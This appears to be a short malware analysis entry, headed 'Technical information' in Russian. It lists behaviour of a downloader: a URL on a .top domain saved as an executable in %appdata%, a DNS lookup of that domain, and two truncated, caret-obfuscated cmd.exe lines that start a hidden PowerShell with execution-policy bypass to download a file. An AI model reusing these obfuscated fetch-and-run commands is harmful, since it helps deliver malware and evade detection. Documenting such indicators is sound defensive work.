Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^O^w^er^sHeL^L.^Ex^E -E^X^ecUTi^OnPOlI^c^Y ^B^yPasS -N^o^p^RoFI^l^e ^-W^in^DOW^ST^Y^le Hi^D^D^En ^(N^E^W-O^B^JEC^t sYSt^E^M.NEt^.^w^EbC^L^i^E^nt)^.DOw^Nl^OAd^f^ilE('ht...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /c "P^O^w^er^sHeL^L.^Ex^E -E^X^ecUTi^OnPOlI^c^Y ^B^yPasS -N^o^p^RoFI^l^e ^-W^in^DOW^ST^Y^le Hi^D^D^En ^(N^E^W-O^B^JEC^t sYSt^E^M.NEt^.^w^EbC^L^i^E^nt)^.DOw^Nl^OAd^f^ilE('ht...' (со скрытым окном)